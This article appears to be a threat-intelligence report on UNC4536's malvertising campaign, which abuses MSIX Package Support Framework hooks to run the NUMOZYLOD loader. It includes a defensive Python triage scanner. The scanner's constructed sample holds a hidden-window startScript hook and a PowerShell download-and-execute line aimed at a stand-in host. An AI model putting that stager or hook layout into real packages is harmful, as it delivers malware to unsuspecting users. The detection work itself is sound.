Malvertising Campaign Targets Users Downloading Popular Business Software
Malvertising campaigns targeting users searching for popular business software, such as Trello, Brave, KeePass, Notion, Steam, and Zoom, deliver a trojanized MSIX installer. The threat actor, tracked as UNC4536, runs a Malware-as-a-Service operation that distributes several malware families by bundling them with legitimate software and hosting the result on fake websites that mimic the genuine download sites.
The installer runs a PowerShell script that Mandiant tracks as NUMOZYLOD, which quietly downloads second-stage payloads in the background. The loader is also known as FakeBat, EugenLoader, and PaykLoader, and Mandiant attributes its distribution to UNC4536.
UNC4536 hosts these trojanized MSIX installers on fake websites designed to mimic legitimate hosting sites.
The attackers abuse the MSIX format both for initial access and for detection evasion: an MSIX package can carry a Package Support Framework (PSF) configuration that runs a script when the application launches, so what looks like an ordinary application install also executes attacker-supplied PowerShell.
In analyzed cases, Trello users are targeted by malvertising attacks redirecting them to fake websites.
Once a victim runs what appears to be a legitimate installer, the NUMOZYLOD PowerShell payload hidden inside the MSIX package executes quietly in the background and downloads the secondary payload, along with any additional packages the operator has configured.
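The MSIX/PSF abuse described above can be triaged offline, because an MSIX file is a zip archive: the AppxManifest.xml names the executable Windows launches, and a PSF config.json can point a startScript hook at a PowerShell file shipped in the package. The following Python script is an added example written for this page, not code from Mandiant or from the campaign; it builds a constructed, harmless MSIX-like archive in memory (file names, the example.invalid URL and the placeholder PE bytes are all made up) and then scans it for a PsfLauncher entry point, PSF script hooks, and embedded .ps1 files, hashing the latter so they can be shared as indicators.

```python
import hashlib
import io
import json
import zipfile
import xml.etree.ElementTree as ET

# Minimal manifest skeleton; the real schema has many more elements, but
# Application/@Executable is the field that matters for this check.
MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">
  <Identity Name="Example.Trello" Publisher="CN=Example" Version="1.0.0.0"/>
  <Applications>
    <Application Id="App" Executable="{exe}" EntryPoint="Windows.FullTrustApplication"/>
  </Applications>
</Package>
"""


def build_sample_msix(with_psf: bool = True) -> bytes:
    """Constructed sample package (not a real malware sample).

    with_psf=True mimics the trojanized layout: PsfLauncher as the entry point,
    a config.json startScript hook, and a hidden PowerShell stager.
    with_psf=False is the benign control: the manifest launches the app directly.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Trello.exe", b"MZ-placeholder")  # stand-in for the real application
        z.writestr("AppxManifest.xml",
                   MANIFEST.format(exe="PsfLauncher1.exe" if with_psf else "Trello.exe"))
        if with_psf:
            z.writestr("PsfLauncher1.exe", b"MZ-placeholder")
            z.writestr("StartingScriptWrapper.ps1", "# PSF wrapper normally shipped with the framework\n")
            z.writestr("config.json", json.dumps({
                "applications": [{
                    "id": "App",
                    "executable": "Trello.exe",
                    "startScript": {               # PSF runs this before the app starts
                        "scriptPath": "setup.ps1",
                        "scriptArguments": "",
                        "runInPackageDirectory": True,
                        "waitForScriptToFinish": False,
                        "showWindow": False,       # keep the console hidden from the victim
                    },
                }]
            }))
            # Assumed stager content: a download-and-execute one-liner to a made-up host.
            z.writestr("setup.ps1",
                       "Invoke-Expression (New-Object Net.WebClient)"
                       ".DownloadString('https://example.invalid/stage2')\n")
    return buf.getvalue()


def scan_msix(data: bytes) -> dict:
    """Inspect an MSIX archive for PSF-driven script execution at launch."""
    report = {"psf_launcher_entrypoint": False, "script_hooks": [],
              "embedded_ps1": {}, "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        lookup = {n.lower(): n for n in names}

        # 1. Does the manifest hand control to PsfLauncher instead of the real app?
        if "appxmanifest.xml" in lookup:
            root = ET.fromstring(z.read(lookup["appxmanifest.xml"]))
            for el in root.iter():
                tag = el.tag.rsplit("}", 1)[-1]          # strip the XML namespace
                if tag == "Application" and "psflauncher" in el.get("Executable", "").lower():
                    report["psf_launcher_entrypoint"] = True

        # 2. PSF config: startScript/endScript entries name the script run on launch.
        if "config.json" in lookup:
            cfg = json.loads(z.read(lookup["config.json"]))
            for app in cfg.get("applications", []):
                for hook in ("startScript", "endScript"):
                    s = app.get(hook)
                    if s:
                        report["script_hooks"].append({
                            "hook": hook,
                            "app": app.get("id"),
                            "scriptPath": s.get("scriptPath"),
                            "hidden": not s.get("showWindow", False),
                        })

        # 3. Hash every embedded PowerShell file so it can be pivoted on as an IOC.
        for n in names:
            if n.lower().endswith(".ps1"):
                report["embedded_ps1"][n] = hashlib.sha256(z.read(n)).hexdigest()

    if report["script_hooks"] or (report["psf_launcher_entrypoint"] and report["embedded_ps1"]):
        report["verdict"] = "review: PSF script hook present"
    return report


if __name__ == "__main__":
    print(json.dumps(scan_msix(build_sample_msix()), indent=2))
```

Legitimate packages can also use PSF, so a hit is a triage signal rather than a conviction; the next step is to read the referenced script and check whether it reaches out to a host unrelated to the software's vendor, as the NUMOZYLOD stagers do.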
The cybercriminals operate under the moniker “eugenfest” and run a Malware-as-a-Service (MaaS) operation that has distributed malware such as IcedID, RedLine Stealer, Carbanak, Lumma Stealer, and Arechclient2.
In 2023, a NUMOZYLOD downloader was observed configured to retrieve the CARBANAK backdoor, delivered through trojanized KeePass installers hosted on fake download sites.
Another campaign delivered a heavily obfuscated NUMOZYLOD sample carrying a Lumma Stealer payload.
A recent widespread data-stealing campaign lures victims with fake websites resembling Roblox FPS Unlocker, YouTube, VLC, or KeePass to distribute Trojans that install malicious Web browser extensions.